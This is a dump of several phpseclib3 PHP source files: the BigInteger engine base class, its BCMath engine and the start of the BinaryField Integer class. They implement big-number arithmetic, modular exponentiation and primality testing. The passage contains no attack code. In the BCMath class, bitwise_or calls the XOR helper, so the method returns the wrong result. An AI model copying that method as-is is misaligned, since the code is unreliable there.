leading 1's as we need to. $leading_ones = chr((1 << ($new_bits & 0x7)) - 1) . str_repeat(chr(0xFF), $new_bits >> 3); self::base256_lshift($leading_ones, $current_bits); $temp = str_pad($temp, strlen($leading_ones), chr(0), STR_PAD_LEFT); return $this->normalize(new static($leading_ones | $temp, 256)); } /** * Logical Left Shift * * Shifts binary strings $shift bits, essentially multiplying by 2**$shift. * * @param string $x * @param int $shift * @return void */ protected static function base256_lshift(&$x, $shift) { if ($shift == 0) { return; } $num_bytes = $shift >> 3; // eg. floor($shift/8) $shift &= 7; // eg. $shift % 8 $carry = 0; for ($i = strlen($x) - 1; $i >= 0; --$i) { $temp = ord($x[$i]) << $shift | $carry; $x[$i] = chr($temp); $carry = $temp >> 8; } $carry = ($carry != 0) ? chr($carry) : ''; $x = $carry . $x . str_repeat(chr(0), $num_bytes); } /** * Logical Left Rotate * * Instead of the top x bits being dropped they're appended to the shifted bit string. * * @param int $shift * @return Engine */ public function bitwise_leftRotate($shift) { $bits = $this->toBytes(); if ($this->precision > 0) { $precision = $this->precision; if (static::FAST_BITWISE) { $mask = $this->bitmask->toBytes(); } else { $mask = $this->bitmask->subtract(new static(1)); $mask = $mask->toBytes(); } } else { $temp = ord($bits[0]); for ($i = 0; $temp >> $i; ++$i) { } $precision = 8 * strlen($bits) - 8 + $i; $mask = chr((1 << ($precision & 0x7)) - 1) . str_repeat(chr(0xFF), $precision >> 3); } if ($shift < 0) { $shift += $precision; } $shift %= $precision; if (!$shift) { return clone $this; } $left = $this->bitwise_leftShift($shift); $left = $left->bitwise_and(new static($mask, 256)); $right = $this->bitwise_rightShift($precision - $shift); $result = static::FAST_BITWISE ? $left->bitwise_or($right) : $left->add($right); return $this->normalize($result); } /** * Logical Right Rotate * * Instead of the bottom x bits being dropped they're prepended to the shifted bit string. * * @param int $shift * @return Engine */ public function bitwise_rightRotate($shift) { return $this->bitwise_leftRotate(-$shift); } /** * Returns the smallest and largest n-bit number * * @param int $bits * @return array{min: static, max: static} */ public static function minMaxBits($bits) { $bytes = $bits >> 3; $min = str_repeat(chr(0), $bytes); $max = str_repeat(chr(0xFF), $bytes); $msb = $bits & 7; if ($msb) { $min = chr(1 << ($msb - 1)) . $min; $max = chr((1 << $msb) - 1) . $max; } else { $min[0] = chr(0x80); } return [ 'min' => new static($min, 256), 'max' => new static($max, 256) ]; } /** * Return the size of a BigInteger in bits * * @return int */ public function getLength() { return strlen($this->toBits()); } /** * Return the size of a BigInteger in bytes * * @return int */ public function getLengthInBytes() { return strlen($this->toBytes()); } /** * Performs some pre-processing for powMod * * @param Engine $e * @param Engine $n * @return static|false */ protected function powModOuter(Engine $e, Engine $n) { $n = $this->bitmask !== false && $this->bitmask->compare($n) < 0 ? $this->bitmask : $n->abs(); if ($e->compare(new static()) < 0) { $e = $e->abs(); $temp = $this->modInverse($n); if ($temp === false) { return false; } return $this->normalize($temp->powModInner($e, $n)); } if ($this->compare($n) > 0) { list(, $temp) = $this->divide($n); return $temp->powModInner($e, $n); } return $this->powModInner($e, $n); } /** * Sliding Window k-ary Modular Exponentiation * * Based on {@link http://www.cacr.math.uwaterloo.ca/hac/about/chap14.pdf#page=27 HAC 14.85} / * {@link http://math.libtomcrypt.com/files/tommath.pdf#page=210 MPM 7.7}. In a departure from those algorithims, * however, this function performs a modular reduction after every multiplication and squaring operation. * As such, this function has the same preconditions that the reductions being used do. * * @template T of Engine * @param Engine $x * @param Engine $e * @param Engine $n * @param class-string $class * @return T */ protected static function slidingWindow(Engine $x, Engine $e, Engine $n, $class) { static $window_ranges = [7, 25, 81, 241, 673, 1793]; // from BigInteger.java's oddModPow function //static $window_ranges = [0, 7, 36, 140, 450, 1303, 3529]; // from MPM 7.3.1 $e_bits = $e->toBits(); $e_length = strlen($e_bits); // calculate the appropriate window size. // $window_size == 3 if $window_ranges is between 25 and 81, for example. for ($i = 0, $window_size = 1; $i < count($window_ranges) && $e_length > $window_ranges[$i]; ++$window_size, ++$i) { } $n_value = $n->value; if (method_exists(static::class, 'generateCustomReduction')) { static::generateCustomReduction($n, $class); } // precompute $this^0 through $this^$window_size $powers = []; $powers[1] = static::prepareReduce($x->value, $n_value, $class); $powers[2] = static::squareReduce($powers[1], $n_value, $class); // we do every other number since substr($e_bits, $i, $j+1) (see below) is supposed to end // in a 1. ie. it's supposed to be odd. $temp = 1 << ($window_size - 1); for ($i = 1; $i < $temp; ++$i) { $i2 = $i << 1; $powers[$i2 + 1] = static::multiplyReduce($powers[$i2 - 1], $powers[2], $n_value, $class); } $result = new $class(1); $result = static::prepareReduce($result->value, $n_value, $class); for ($i = 0; $i < $e_length;) { if (!$e_bits[$i]) { $result = static::squareReduce($result, $n_value, $class); ++$i; } else { for ($j = $window_size - 1; $j > 0; --$j) { if (!empty($e_bits[$i + $j])) { break; } } // eg. the length of substr($e_bits, $i, $j + 1) for ($k = 0; $k <= $j; ++$k) { $result = static::squareReduce($result, $n_value, $class); } $result = static::multiplyReduce($result, $powers[bindec(substr($e_bits, $i, $j + 1))], $n_value, $class); $i += $j + 1; } } $temp = new $class(); $temp->value = static::reduce($result, $n_value, $class); return $temp; } /** * Generates a random number of a certain size * * Bit length is equal to $size * * @param int $size * @return Engine */ public static function random($size) { extract(static::minMaxBits($size)); /** * @var BigInteger $min * @var BigInteger $max */ return static::randomRange($min, $max); } /** * Generates a random prime number of a certain size * * Bit length is equal to $size * * @param int $size * @return Engine */ public static function randomPrime($size) { extract(static::minMaxBits($size)); /** * @var static $min * @var static $max */ return static::randomRangePrime($min, $max); } /** * Performs some pre-processing for randomRangePrime * * @param Engine $min * @param Engine $max * @return static|false */ protected static function randomRangePrimeOuter(Engine $min, Engine $max) { $compare = $max->compare($min); if (!$compare) { return $min->isPrime() ? $min : false; } elseif ($compare < 0) { // if $min is bigger then $max, swap $min and $max $temp = $max; $max = $min; $min = $temp; } $x = static::randomRange($min, $max); return static::randomRangePrimeInner($x, $min, $max); } /** * Generate a random number between a range * * Returns a random number between $min and $max where $min and $max * can be defined using one of the two methods: * * BigInteger::randomRange($min, $max) * BigInteger::randomRange($max, $min) * * @param Engine $min * @param Engine $max * @return Engine */ protected static function randomRangeHelper(Engine $min, Engine $max) { $compare = $max->compare($min); if (!$compare) { return $min; } elseif ($compare < 0) { // if $min is bigger then $max, swap $min and $max $temp = $max; $max = $min; $min = $temp; } if (!isset(static::$one[static::class])) { static::$one[static::class] = new static(1); } $max = $max->subtract($min->subtract(static::$one[static::class])); $size = strlen(ltrim($max->toBytes(), chr(0))); /* doing $random % $max doesn't work because some numbers will be more likely to occur than others. eg. if $max is 140 and $random's max is 255 then that'd mean both $random = 5 and $random = 145 would produce 5 whereas the only value of random that could produce 139 would be 139. ie. not all numbers would be equally likely. some would be more likely than others. creating a whole new random number until you find one that is within the range doesn't work because, for sufficiently small ranges, the likelihood that you'd get a number within that range would be pretty small. eg. with $random's max being 255 and if your $max being 1 the probability would be pretty high that $random would be greater than $max. phpseclib works around this using the technique described here: http://crypto.stackexchange.com/questions/5708/creating-a-small-number-from-a-cryptographically-secure-random-string */ $random_max = new static(chr(1) . str_repeat("\0", $size), 256); $random = new static(Random::string($size), 256); list($max_multiple) = $random_max->divide($max); $max_multiple = $max_multiple->multiply($max); while ($random->compare($max_multiple) >= 0) { $random = $random->subtract($max_multiple); $random_max = $random_max->subtract($max_multiple); $random = $random->bitwise_leftShift(8); $random = $random->add(new static(Random::string(1), 256)); $random_max = $random_max->bitwise_leftShift(8); list($max_multiple) = $random_max->divide($max); $max_multiple = $max_multiple->multiply($max); } list(, $random) = $random->divide($max); return $random->add($min); } /** * Performs some post-processing for randomRangePrime * * @param Engine $x * @param Engine $min * @param Engine $max * @return static|false */ protected static function randomRangePrimeInner(Engine $x, Engine $min, Engine $max) { if (!isset(static::$two[static::class])) { static::$two[static::class] = new static('2'); } $x->make_odd(); if ($x->compare($max) > 0) { // if $x > $max then $max is even and if $min == $max then no prime number exists between the specified range if ($min->equals($max)) { return false; } $x = clone $min; $x->make_odd(); } $initial_x = clone $x; while (true) { if ($x->isPrime()) { return $x; } $x = $x->add(static::$two[static::class]); if ($x->compare($max) > 0) { $x = clone $min; if ($x->equals(static::$two[static::class])) { return $x; } $x->make_odd(); } if ($x->equals($initial_x)) { return false; } } } /** * Sets the $t parameter for primality testing * * @return int */ protected function setupIsPrime() { $length = $this->getLengthInBytes(); // see HAC 4.49 "Note (controlling the error probability)" // @codingStandardsIgnoreStart if ($length >= 163) { $t = 2; } // floor(1300 / 8) else if ($length >= 106) { $t = 3; } // floor( 850 / 8) else if ($length >= 81 ) { $t = 4; } // floor( 650 / 8) else if ($length >= 68 ) { $t = 5; } // floor( 550 / 8) else if ($length >= 56 ) { $t = 6; } // floor( 450 / 8) else if ($length >= 50 ) { $t = 7; } // floor( 400 / 8) else if ($length >= 43 ) { $t = 8; } // floor( 350 / 8) else if ($length >= 37 ) { $t = 9; } // floor( 300 / 8) else if ($length >= 31 ) { $t = 12; } // floor( 250 / 8) else if ($length >= 25 ) { $t = 15; } // floor( 200 / 8) else if ($length >= 18 ) { $t = 18; } // floor( 150 / 8) else { $t = 27; } // @codingStandardsIgnoreEnd return $t; } /** * Tests Primality * * Uses the {@link http://en.wikipedia.org/wiki/Miller%E2%80%93Rabin_primality_test Miller-Rabin primality test}. * See {@link http://www.cacr.math.uwaterloo.ca/hac/about/chap4.pdf#page=8 HAC 4.24} for more info. * * @param int $t * @return bool */ protected function testPrimality($t) { if (!$this->testSmallPrimes()) { return false; } $n = clone $this; $n_1 = $n->subtract(static::$one[static::class]); $n_2 = $n->subtract(static::$two[static::class]); $r = clone $n_1; $s = static::scan1divide($r); for ($i = 0; $i < $t; ++$i) { $a = static::randomRange(static::$two[static::class], $n_2); $y = $a->modPow($r, $n); if (!$y->equals(static::$one[static::class]) && !$y->equals($n_1)) { for ($j = 1; $j < $s && !$y->equals($n_1); ++$j) { $y = $y->modPow(static::$two[static::class], $n); if ($y->equals(static::$one[static::class])) { return false; } } if (!$y->equals($n_1)) { return false; } } } return true; } /** * Checks a numer to see if it's prime * * Assuming the $t parameter is not set, this function has an error rate of 2**-80. The main motivation for the * $t parameter is distributability. BigInteger::randomPrime() can be distributed across multiple pageloads * on a website instead of just one. * * @param int|bool $t * @return bool */ public function isPrime($t = false) { if (!$t) { $t = $this->setupIsPrime(); } return $this->testPrimality($t); } /** * Performs a few preliminary checks on root * * @param int $n * @return Engine */ protected function rootHelper($n) { if ($n < 1) { return clone static::$zero[static::class]; } // we want positive exponents if ($this->compare(static::$one[static::class]) < 0) { return clone static::$zero[static::class]; } // we want positive numbers if ($this->compare(static::$two[static::class]) < 0) { return clone static::$one[static::class]; } // n-th root of 1 or 2 is 1 return $this->rootInner($n); } /** * Calculates the nth root of a biginteger. * * Returns the nth root of a positive biginteger, where n defaults to 2 * * {@internal This function is based off of {@link http://mathforum.org/library/drmath/view/52605.html this page} and {@link http://stackoverflow.com/questions/11242920/calculating-nth-root-with-bcmath-in-php this stackoverflow question}.} * * @param int $n * @return Engine */ protected function rootInner($n) { $n = new static($n); // g is our guess number $g = static::$two[static::class]; // while (g^n < num) g=g*2 while ($g->pow($n)->compare($this) < 0) { $g = $g->multiply(static::$two[static::class]); } // if (g^n==num) num is a power of 2, we're lucky, end of job // == 0 bccomp(bcpow($g, $n), $n->value)==0 if ($g->pow($n)->equals($this) > 0) { $root = $g; return $this->normalize($root); } // if we're here num wasn't a power of 2 :( $og = $g; // og means original guess and here is our upper bound $g = $g->divide(static::$two[static::class])[0]; // g is set to be our lower bound $step = $og->subtract($g)->divide(static::$two[static::class])[0]; // step is the half of upper bound - lower bound $g = $g->add($step); // we start at lower bound + step , basically in the middle of our interval // while step>1 while ($step->compare(static::$one[static::class]) == 1) { $guess = $g->pow($n); $step = $step->divide(static::$two[static::class])[0]; $comp = $guess->compare($this); // compare our guess with real number switch ($comp) { case -1: // if guess is lower we add the new step $g = $g->add($step); break; case 1: // if guess is higher we sub the new step $g = $g->subtract($step); break; case 0: // if guess is exactly the num we're done, we return the value $root = $g; break 2; } } if ($comp == 1) { $g = $g->subtract($step); } // whatever happened, g is the closest guess we can make so return it $root = $g; return $this->normalize($root); } /** * Calculates the nth root of a biginteger. * * @param int $n * @return Engine */ public function root($n = 2) { return $this->rootHelper($n); } /** * Return the minimum BigInteger between an arbitrary number of BigIntegers. * * @param array $nums * @return Engine */ protected static function minHelper(array $nums) { if (count($nums) == 1) { return $nums[0]; } $min = $nums[0]; for ($i = 1; $i < count($nums); $i++) { $min = $min->compare($nums[$i]) > 0 ? $nums[$i] : $min; } return $min; } /** * Return the minimum BigInteger between an arbitrary number of BigIntegers. * * @param array $nums * @return Engine */ protected static function maxHelper(array $nums) { if (count($nums) == 1) { return $nums[0]; } $max = $nums[0]; for ($i = 1; $i < count($nums); $i++) { $max = $max->compare($nums[$i]) < 0 ? $nums[$i] : $max; } return $max; } /** * Create Recurring Modulo Function * * Sometimes it may be desirable to do repeated modulos with the same number outside of * modular exponentiation * * @return callable */ public function createRecurringModuloFunction() { $class = static::class; $fqengine = !method_exists(static::$modexpEngine[static::class], 'reduce') ? '\\phpseclib3\\Math\\BigInteger\\Engines\\' . static::ENGINE_DIR . '\\DefaultEngine' : static::$modexpEngine[static::class]; if (method_exists($fqengine, 'generateCustomReduction')) { $func = $fqengine::generateCustomReduction($this, static::class); return eval('return function(' . static::class . ' $x) use ($func, $class) { $r = new $class(); $r->value = $func($x->value); return $r; };'); } $n = $this->value; return eval('return function(' . static::class . ' $x) use ($n, $fqengine, $class) { $r = new $class(); $r->value = $fqengine::reduce($x->value, $n, $class); return $r; };'); } /** * Calculates the greatest common divisor and Bezout's identity. * * @param Engine $n * @return array{gcd: Engine, x: Engine, y: Engine} */ protected function extendedGCDHelper(Engine $n) { $u = clone $this; $v = clone $n; $one = new static(1); $zero = new static(); $a = clone $one; $b = clone $zero; $c = clone $zero; $d = clone $one; while (!$v->equals($zero)) { list($q) = $u->divide($v); $temp = $u; $u = $v; $v = $temp->subtract($v->multiply($q)); $temp = $a; $a = $c; $c = $temp->subtract($a->multiply($q)); $temp = $b; $b = $d; $d = $temp->subtract($b->multiply($q)); } return [ 'gcd' => $u, 'x' => $a, 'y' => $b ]; } /** * Bitwise Split * * Splits BigInteger's into chunks of $split bits * * @param int $split * @return Engine[] */ public function bitwise_split($split) { if ($split < 1) { throw new \RuntimeException('Offset must be greater than 1'); } $mask = static::$one[static::class]->bitwise_leftShift($split)->subtract(static::$one[static::class]); $num = clone $this; $vals = []; while (!$num->equals(static::$zero[static::class])) { $vals[] = $num->bitwise_and($mask); $num = $num->bitwise_rightShift($split); } return array_reverse($vals); } /** * Logical And * * @param Engine $x * @return Engine */ protected function bitwiseAndHelper(Engine $x) { $left = $this->toBytes(true); $right = $x->toBytes(true); $length = max(strlen($left), strlen($right)); $left = str_pad($left, $length, chr(0), STR_PAD_LEFT); $right = str_pad($right, $length, chr(0), STR_PAD_LEFT); return $this->normalize(new static($left & $right, -256)); } /** * Logical Or * * @param Engine $x * @return Engine */ protected function bitwiseOrHelper(Engine $x) { $left = $this->toBytes(true); $right = $x->toBytes(true); $length = max(strlen($left), strlen($right)); $left = str_pad($left, $length, chr(0), STR_PAD_LEFT); $right = str_pad($right, $length, chr(0), STR_PAD_LEFT); return $this->normalize(new static($left | $right, -256)); } /** * Logical Exclusive Or * * @param Engine $x * @return Engine */ protected function bitwiseXorHelper(Engine $x) { $left = $this->toBytes(true); $right = $x->toBytes(true); $length = max(strlen($left), strlen($right)); $left = str_pad($left, $length, chr(0), STR_PAD_LEFT); $right = str_pad($right, $length, chr(0), STR_PAD_LEFT); return $this->normalize(new static($left ^ $right, -256)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/BCMath.php000064400000042454147600400120024071 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Math\BigInteger\Engines; use phpseclib3\Common\Functions\Strings; use phpseclib3\Exception\BadConfigurationException; /** * BCMath Engine. * * @author Jim Wigginton */ class BCMath extends Engine { /** * Can Bitwise operations be done fast? * * @see parent::bitwise_leftRotate() * @see parent::bitwise_rightRotate() */ const FAST_BITWISE = false; /** * Engine Directory * * @see parent::setModExpEngine */ const ENGINE_DIR = 'BCMath'; /** * Test for engine validity * * @return bool * @see parent::__construct() */ public static function isValidEngine() { return extension_loaded('bcmath'); } /** * Default constructor * * @param mixed $x integer Base-10 number or base-$base number if $base set. * @param int $base * @see parent::__construct() */ public function __construct($x = 0, $base = 10) { if (!isset(static::$isValidEngine[static::class])) { static::$isValidEngine[static::class] = self::isValidEngine(); } if (!static::$isValidEngine[static::class]) { throw new BadConfigurationException('BCMath is not setup correctly on this system'); } $this->value = '0'; parent::__construct($x, $base); } /** * Initialize a BCMath BigInteger Engine instance * * @param int $base * @see parent::__construct() */ protected function initialize($base) { switch (abs($base)) { case 256: // round $len to the nearest 4 $len = (strlen($this->value) + 3) & ~3; $x = str_pad($this->value, $len, chr(0), STR_PAD_LEFT); $this->value = '0'; for ($i = 0; $i < $len; $i += 4) { $this->value = bcmul($this->value, '4294967296', 0); // 4294967296 == 2**32 $this->value = bcadd( $this->value, 0x1000000 * ord($x[$i]) + ((ord($x[$i + 1]) << 16) | (ord( $x[$i + 2] ) << 8) | ord($x[$i + 3])), 0 ); } if ($this->is_negative) { $this->value = '-' . $this->value; } break; case 16: $x = (strlen($this->value) & 1) ? '0' . $this->value : $this->value; $temp = new self(Strings::hex2bin($x), 256); $this->value = $this->is_negative ? '-' . $temp->value : $temp->value; $this->is_negative = false; break; case 10: // explicitly casting $x to a string is necessary, here, since doing $x[0] on -1 yields different // results then doing it on '-1' does (modInverse does $x[0]) $this->value = $this->value === '-' ? '0' : (string)$this->value; } } /** * Converts a BigInteger to a base-10 number. * * @return string */ public function toString() { if ($this->value === '0') { return '0'; } return ltrim($this->value, '0'); } /** * Converts a BigInteger to a byte string (eg. base-256). * * @param bool $twos_compliment * @return string */ public function toBytes($twos_compliment = false) { if ($twos_compliment) { return $this->toBytesHelper(); } $value = ''; $current = $this->value; if ($current[0] == '-') { $current = substr($current, 1); } while (bccomp($current, '0', 0) > 0) { $temp = bcmod($current, '16777216'); $value = chr($temp >> 16) . chr($temp >> 8) . chr($temp) . $value; $current = bcdiv($current, '16777216', 0); } return $this->precision > 0 ? substr(str_pad($value, $this->precision >> 3, chr(0), STR_PAD_LEFT), -($this->precision >> 3)) : ltrim($value, chr(0)); } /** * Adds two BigIntegers. * * @param BCMath $y * @return BCMath */ public function add(BCMath $y) { $temp = new self(); $temp->value = bcadd($this->value, $y->value); return $this->normalize($temp); } /** * Subtracts two BigIntegers. * * @param BCMath $y * @return BCMath */ public function subtract(BCMath $y) { $temp = new self(); $temp->value = bcsub($this->value, $y->value); return $this->normalize($temp); } /** * Multiplies two BigIntegers. * * @param BCMath $x * @return BCMath */ public function multiply(BCMath $x) { $temp = new self(); $temp->value = bcmul($this->value, $x->value); return $this->normalize($temp); } /** * Divides two BigIntegers. * * Returns an array whose first element contains the quotient and whose second element contains the * "common residue". If the remainder would be positive, the "common residue" and the remainder are the * same. If the remainder would be negative, the "common residue" is equal to the sum of the remainder * and the divisor (basically, the "common residue" is the first positive modulo). * * @param BCMath $y * @return array{static, static} */ public function divide(BCMath $y) { $quotient = new self(); $remainder = new self(); $quotient->value = bcdiv($this->value, $y->value, 0); $remainder->value = bcmod($this->value, $y->value); if ($remainder->value[0] == '-') { $remainder->value = bcadd($remainder->value, $y->value[0] == '-' ? substr($y->value, 1) : $y->value, 0); } return [$this->normalize($quotient), $this->normalize($remainder)]; } /** * Calculates modular inverses. * * Say you have (30 mod 17 * x mod 17) mod 17 == 1. x can be found using modular inverses. * * @param BCMath $n * @return false|BCMath */ public function modInverse(BCMath $n) { return $this->modInverseHelper($n); } /** * Calculates the greatest common divisor and Bezout's identity. * * Say you have 693 and 609. The GCD is 21. Bezout's identity states that there exist integers x and y such that * 693*x + 609*y == 21. In point of fact, there are actually an infinite number of x and y combinations and which * combination is returned is dependent upon which mode is in use. See * {@link http://en.wikipedia.org/wiki/B%C3%A9zout%27s_identity Bezout's identity - Wikipedia} for more information. * * @param BCMath $n * @return array{gcd: static, x: static, y: static} */ public function extendedGCD(BCMath $n) { // it might be faster to use the binary xGCD algorithim here, as well, but (1) that algorithim works // best when the base is a power of 2 and (2) i don't think it'd make much difference, anyway. as is, // the basic extended euclidean algorithim is what we're using. $u = $this->value; $v = $n->value; $a = '1'; $b = '0'; $c = '0'; $d = '1'; while (bccomp($v, '0', 0) != 0) { $q = bcdiv($u, $v, 0); $temp = $u; $u = $v; $v = bcsub($temp, bcmul($v, $q, 0), 0); $temp = $a; $a = $c; $c = bcsub($temp, bcmul($a, $q, 0), 0); $temp = $b; $b = $d; $d = bcsub($temp, bcmul($b, $q, 0), 0); } return [ 'gcd' => $this->normalize(new static($u)), 'x' => $this->normalize(new static($a)), 'y' => $this->normalize(new static($b)) ]; } /** * Calculates the greatest common divisor * * Say you have 693 and 609. The GCD is 21. * * @param BCMath $n * @return BCMath */ public function gcd(BCMath $n) { extract($this->extendedGCD($n)); /** @var BCMath $gcd */ return $gcd; } /** * Absolute value. * * @return BCMath */ public function abs() { $temp = new static(); $temp->value = strlen($this->value) && $this->value[0] == '-' ? substr($this->value, 1) : $this->value; return $temp; } /** * Logical And * * @param BCMath $x * @return BCMath */ public function bitwise_and(BCMath $x) { return $this->bitwiseAndHelper($x); } /** * Logical Or * * @param BCMath $x * @return BCMath */ public function bitwise_or(BCMath $x) { return $this->bitwiseXorHelper($x); } /** * Logical Exclusive Or * * @param BCMath $x * @return BCMath */ public function bitwise_xor(BCMath $x) { return $this->bitwiseXorHelper($x); } /** * Logical Right Shift * * Shifts BigInteger's by $shift bits, effectively dividing by 2**$shift. * * @param int $shift * @return BCMath */ public function bitwise_rightShift($shift) { $temp = new static(); $temp->value = bcdiv($this->value, bcpow('2', $shift, 0), 0); return $this->normalize($temp); } /** * Logical Left Shift * * Shifts BigInteger's by $shift bits, effectively multiplying by 2**$shift. * * @param int $shift * @return BCMath */ public function bitwise_leftShift($shift) { $temp = new static(); $temp->value = bcmul($this->value, bcpow('2', $shift, 0), 0); return $this->normalize($temp); } /** * Compares two numbers. * * Although one might think !$x->compare($y) means $x != $y, it, in fact, means the opposite. The reason for this * is demonstrated thusly: * * $x > $y: $x->compare($y) > 0 * $x < $y: $x->compare($y) < 0 * $x == $y: $x->compare($y) == 0 * * Note how the same comparison operator is used. If you want to test for equality, use $x->equals($y). * * {@internal Could return $this->subtract($x), but that's not as fast as what we do do.} * * @param BCMath $y * @return int in case < 0 if $this is less than $y; > 0 if $this is greater than $y, and 0 if they are equal. * @see self::equals() */ public function compare(BCMath $y) { return bccomp($this->value, $y->value, 0); } /** * Tests the equality of two numbers. * * If you need to see if one number is greater than or less than another number, use BigInteger::compare() * * @param BCMath $x * @return bool */ public function equals(BCMath $x) { return $this->value == $x->value; } /** * Performs modular exponentiation. * * @param BCMath $e * @param BCMath $n * @return BCMath */ public function modPow(BCMath $e, BCMath $n) { return $this->powModOuter($e, $n); } /** * Performs modular exponentiation. * * Alias for modPow(). * * @param BCMath $e * @param BCMath $n * @return BCMath */ public function powMod(BCMath $e, BCMath $n) { return $this->powModOuter($e, $n); } /** * Performs modular exponentiation. * * @param BCMath $e * @param BCMath $n * @return BCMath */ protected function powModInner(BCMath $e, BCMath $n) { try { $class = static::$modexpEngine[static::class]; return $class::powModHelper($this, $e, $n, static::class); } catch (\Exception $err) { return BCMath\DefaultEngine::powModHelper($this, $e, $n, static::class); } } /** * Normalize * * Removes leading zeros and truncates (if necessary) to maintain the appropriate precision * * @param BCMath $result * @return BCMath */ protected function normalize(BCMath $result) { $result->precision = $this->precision; $result->bitmask = $this->bitmask; if ($result->bitmask !== false) { $result->value = bcmod($result->value, $result->bitmask->value); } return $result; } /** * Generate a random prime number between a range * * If there's not a prime within the given range, false will be returned. * * @param BCMath $min * @param BCMath $max * @return false|BCMath */ public static function randomRangePrime(BCMath $min, BCMath $max) { return self::randomRangePrimeOuter($min, $max); } /** * Generate a random number between a range * * Returns a random number between $min and $max where $min and $max * can be defined using one of the two methods: * * BigInteger::randomRange($min, $max) * BigInteger::randomRange($max, $min) * * @param BCMath $min * @param BCMath $max * @return BCMath */ public static function randomRange(BCMath $min, BCMath $max) { return self::randomRangeHelper($min, $max); } /** * Make the current number odd * * If the current number is odd it'll be unchanged. If it's even, one will be added to it. * * @see self::randomPrime() */ protected function make_odd() { if (!$this->isOdd()) { $this->value = bcadd($this->value, '1'); } } /** * Test the number against small primes. * * @see self::isPrime() */ protected function testSmallPrimes() { if ($this->value === '1') { return false; } if ($this->value === '2') { return true; } if ($this->value[strlen($this->value) - 1] % 2 == 0) { return false; } $value = $this->value; foreach (self::PRIMES as $prime) { $r = bcmod($this->value, $prime); if ($r == '0') { return $this->value == $prime; } } return true; } /** * Scan for 1 and right shift by that amount * * ie. $s = gmp_scan1($n, 0) and $r = gmp_div_q($n, gmp_pow(gmp_init('2'), $s)); * * @param BCMath $r * @return int * @see self::isPrime() */ public static function scan1divide(BCMath $r) { $r_value = &$r->value; $s = 0; // if $n was 1, $r would be 0 and this would be an infinite loop, hence our $this->equals(static::$one[static::class]) check earlier while ($r_value[strlen($r_value) - 1] % 2 == 0) { $r_value = bcdiv($r_value, '2', 0); ++$s; } return $s; } /** * Performs exponentiation. * * @param BCMath $n * @return BCMath */ public function pow(BCMath $n) { $temp = new self(); $temp->value = bcpow($this->value, $n->value); return $this->normalize($temp); } /** * Return the minimum BigInteger between an arbitrary number of BigIntegers. * * @param BCMath ...$nums * @return BCMath */ public static function min(BCMath ...$nums) { return self::minHelper($nums); } /** * Return the maximum BigInteger between an arbitrary number of BigIntegers. * * @param BCMath ...$nums * @return BCMath */ public static function max(BCMath ...$nums) { return self::maxHelper($nums); } /** * Tests BigInteger to see if it is between two integers, inclusive * * @param BCMath $min * @param BCMath $max * @return bool */ public function between(BCMath $min, BCMath $max) { return $this->compare($min) >= 0 && $this->compare($max) <= 0; } /** * Set Bitmask * * @param int $bits * @return Engine * @see self::setPrecision() */ protected static function setBitmask($bits) { $temp = parent::setBitmask($bits); return $temp->add(static::$one[static::class]); } /** * Is Odd? * * @return bool */ public function isOdd() { return $this->value[strlen($this->value) - 1] % 2 == 1; } /** * Tests if a bit is set * * @return bool */ public function testBit($x) { return bccomp( bcmod($this->value, bcpow('2', $x + 1, 0)), bcpow('2', $x, 0), 0 ) >= 0; } /** * Is Negative? * * @return bool */ public function isNegative() { return strlen($this->value) && $this->value[0] == '-'; } /** * Negate * * Given $k, returns -$k * * @return BCMath */ public function negate() { $temp = clone $this; if (!strlen($temp->value)) { return $temp; } $temp->value = $temp->value[0] == '-' ? substr($this->value, 1) : '-' . $this->value; return $temp; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Math/BinaryField/Integer.php000064400000032716147600400120023151 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License */ namespace phpseclib3\Math\BinaryField; use phpseclib3\Common\Functions\Strings; use phpseclib3\Math\BigInteger; use phpseclib3\Math\BinaryField; use phpseclib3\Math\Common\FiniteField\Integer as Base; /** * Binary Finite Fields * * @author Jim Wigginton */ class Integer extends Base { /** * Holds the BinaryField's value * * @var string */ protected $value; /** * Keeps track of current instance * * @var int */ protected $instanceID; /** * Holds the PrimeField's modulo * * @var array */ protected static $modulo; /** * Holds a pre-generated function to perform modulo reductions * * @var callable[] */ protected static $reduce; /** * Default constructor */ public function __construct($instanceID, $num = '') { $this->instanceID = $instanceID; if (!strlen($num)) { $this->value = ''; } else { $reduce = static::$reduce[$instanceID]; $this->value = $reduce($num); } } /** * Set the modulo for a given instance * @param int $instanceID * @param string $modulo */ public static function setModulo($instanceID, $modulo) { static::$modulo[$instanceID] = $modulo; } /** * Set the modulo for a given instance */ public static function setRecurringModuloFunction($instanceID, callable $function) { static::$reduce[$instanceID] = $function; } /** * Tests a parameter to see if it's of the right instance * * Throws an exception if the incorrect class is being utilized */ private static function checkInstance(self $x, self $y) { if ($x->instanceID != $y->instanceID) { throw new \UnexpectedValueException('The instances of the two BinaryField\Integer objects do not match'); } } /** * Tests the equality of two numbers. * * @return bool */ public function equals(self $x) { static::checkInstance($this, $x); return $this->value == $x->value; } /** * Compares two numbers. * * @return int */ public function compare(self $x) { static::checkInstance($this, $x); $a = $this->value; $b = $x->value; $length = max(strlen($a), strlen($b)); $a = str_pad($a, $length, "\0", STR_PAD_LEFT); $b = str_pad($b, $length, "\0", STR_PAD_LEFT); return strcmp($a, $b); } /** * Returns the degree of the polynomial * * @param string $x * @return int */ private static function deg($x) { $x = ltrim($x, "\0"); $xbit = decbin(ord($x[0])); $xlen = $xbit == '0' ? 0 : strlen($xbit); $len = strlen($x); if (!$len) { return -1; } return 8 * strlen($x) - 9 + $xlen; } /** * Perform polynomial division * * @return string[] * @link https://en.wikipedia.org/wiki/Polynomial_greatest_common_divisor#Euclidean_division */ private static function polynomialDivide($x, $y) { // in wikipedia's description of the algorithm, lc() is the leading coefficient. over a binary field that's // always going to be 1. $q = chr(0); $d = static::deg($y); $r = $x; while (($degr = static::deg($r)) >= $d) { $s = '1' . str_repeat('0', $degr - $d); $s = BinaryField::base2ToBase256($s); $length = max(strlen($s), strlen($q)); $q = !isset($q) ? $s : str_pad($q, $length, "\0", STR_PAD_LEFT) ^ str_pad($s, $length, "\0", STR_PAD_LEFT); $s = static::polynomialMultiply($s, $y); $length = max(strlen($r), strlen($s)); $r = str_pad($r, $length, "\0", 